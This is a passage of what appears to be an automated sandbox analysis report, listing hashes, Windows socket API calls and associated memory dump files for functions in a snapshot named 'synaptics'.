                                                                                                                                                                                                                                    • API String ID: 3676581841-0
                                                                                                                                                                                                                                    • Opcode ID: f5ecb3e70f009941c373f160617d199c58a38e8b3e594fb39c1c1a012bab541f
                                                                                                                                                                                                                                    • Instruction ID: 9efd59fb38de60ed15f5b5a0d5e3c9c0aa6a1d91a33b83fa0cb23ffbcb0c1b56
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5ecb3e70f009941c373f160617d199c58a38e8b3e594fb39c1c1a012bab541f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3011087261D200ABEB200F648E84F2A76AFFB4635CF1A0537F921D5DA0D731D814D796
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00001006,?,?), ref: 6C719417
                                                                                                                                                                                                                                    • getsockopt.WS2_32 ref: 6C71945C
                                                                                                                                                                                                                                    • setsockopt.WS2_32(00000004,00000029,0000000E,?,00000004), ref: 6C719558
                                                                                                                                                                                                                                    • setsockopt.WS2_32(00000004,00000000,0000000E,?,00000004), ref: 6C719575
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: setsockopt$getsockopt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3424602503-0
                                                                                                                                                                                                                                    • Opcode ID: 84da8220f0436d399e722dceccd8947fd5e95bfabf833cb6f9c4e714b0354e4e
                                                                                                                                                                                                                                    • Instruction ID: 50b3531e6b8cfbb8b0d5a5832df9c300bc74a301d4a4ee80757e3cfbc5cd86b6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84da8220f0436d399e722dceccd8947fd5e95bfabf833cb6f9c4e714b0354e4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0A1E4777092008FD7048F29E94069AB7E5FBD8326F28063BFA56C7B90D770D50A9B91
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 6C718FC6
                                                                                                                                                                                                                                      • Part of subcall function 6C719930: getsockopt.WS2_32(?,0000FFFF,00001006,?,?), ref: 6C719984
                                                                                                                                                                                                                                      • Part of subcall function 6C719930: GetSystemTime.KERNEL32(?,?,?,?), ref: 6C7199CF
                                                                                                                                                                                                                                      • Part of subcall function 6C719930: SystemTimeToFileTime.KERNEL32(00000000,?,?,?), ref: 6C7199DF
                                                                                                                                                                                                                                    • recvfrom.WS2_32(?,?,?,?,00000000), ref: 6C719011
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 6C719066
                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00001006,00000000,00000004), ref: 6C7190B1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
